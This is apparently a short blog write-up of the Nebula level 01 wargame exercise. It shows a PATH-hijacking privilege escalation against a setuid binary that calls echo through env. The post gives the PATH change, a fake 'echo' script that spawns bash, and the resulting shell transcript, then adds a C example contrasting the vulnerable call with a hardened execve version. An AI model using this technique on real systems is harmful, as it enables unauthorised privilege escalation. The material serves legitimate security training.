Exploit Exercises Nebula Level 01

After completing Nebula level 00, I’ve finally had time to move to Level 01, and give it some thought.

In level01 you’re given a short code example, and asked to exploit it. After looking at the code for a short period, it was clear that the issue was in the line:

system("/usr/bin/env echo and now what?");

I’m not a C programmer, so I had to look up the other stuff, but when I realized that echo was not an explicit path, it was clear that this was the exploit.

To exploit this I did the following:

PATH=~:$PATH

In /home/flag01 I created a script named echo, with the following content:

#!/bin/bash

/bin/bash

Make the script executable with chmod +x, then run /home/flag01/flag01:

level01@nebula:~$ chmod +x echo 
level01@nebula:~$ /home/flag01/flag01 
flag01@nebula:~$ getflag
You have successfully executed getflag on a target account
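
The dependence on the caller's PATH, and one way to remove it, as an added example (not code from the level or from the original post): `run_page_call` repeats the `system()` line quoted above, and `run_fixed_call` executes an absolute path with a fixed environment. The function names, the `/bin/echo` location and the demo directory are assumptions.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* The call quoted on the page: env looks "echo" up in the caller's PATH. */
static int run_page_call(void) {
    int st = system("/usr/bin/env echo and now what?");
    return (st != -1 && WIFEXITED(st)) ? WEXITSTATUS(st) : -1;
}

/* Hardened form: absolute path, no shell, fixed environment.
   Assumption: echo is installed at /bin/echo. */
static int run_fixed_call(void) {
    char *const argv[] = { "echo", "and now what?", NULL };
    char *const envp[] = { "PATH=/usr/bin:/bin", NULL };
    int st;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execve("/bin/echo", argv, envp);  /* never consults PATH */
        _exit(127);                       /* reached only if execve fails */
    }
    if (waitpid(pid, &st, 0) < 0) return -1;
    return WIFEXITED(st) ? WEXITSTATUS(st) : -1;
}

/* Set the caller-controlled PATH, then return the chosen variant's exit status. */
int exit_status_with_path(const char *path, int hardened) {
    if (setenv("PATH", path, 1) != 0) return -1;
    return hardened ? run_fixed_call() : run_page_call();
}

int main(void) {
    /* Constructed input: a PATH whose only entry contains no echo binary. */
    const char *path = "/nonexistent-demo-dir";
    printf("page call exit status:  %d\n", exit_status_with_path(path, 0));
    printf("fixed call exit status: %d\n", exit_status_with_path(path, 1));
    return 0;
}
```

With PATH pointing at a directory that holds no echo, the page's call exits non-zero while the fixed call still prints the message, which shows that only the former lets the caller decide which program runs.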

Now on to Nebula Level02 when I have some time.
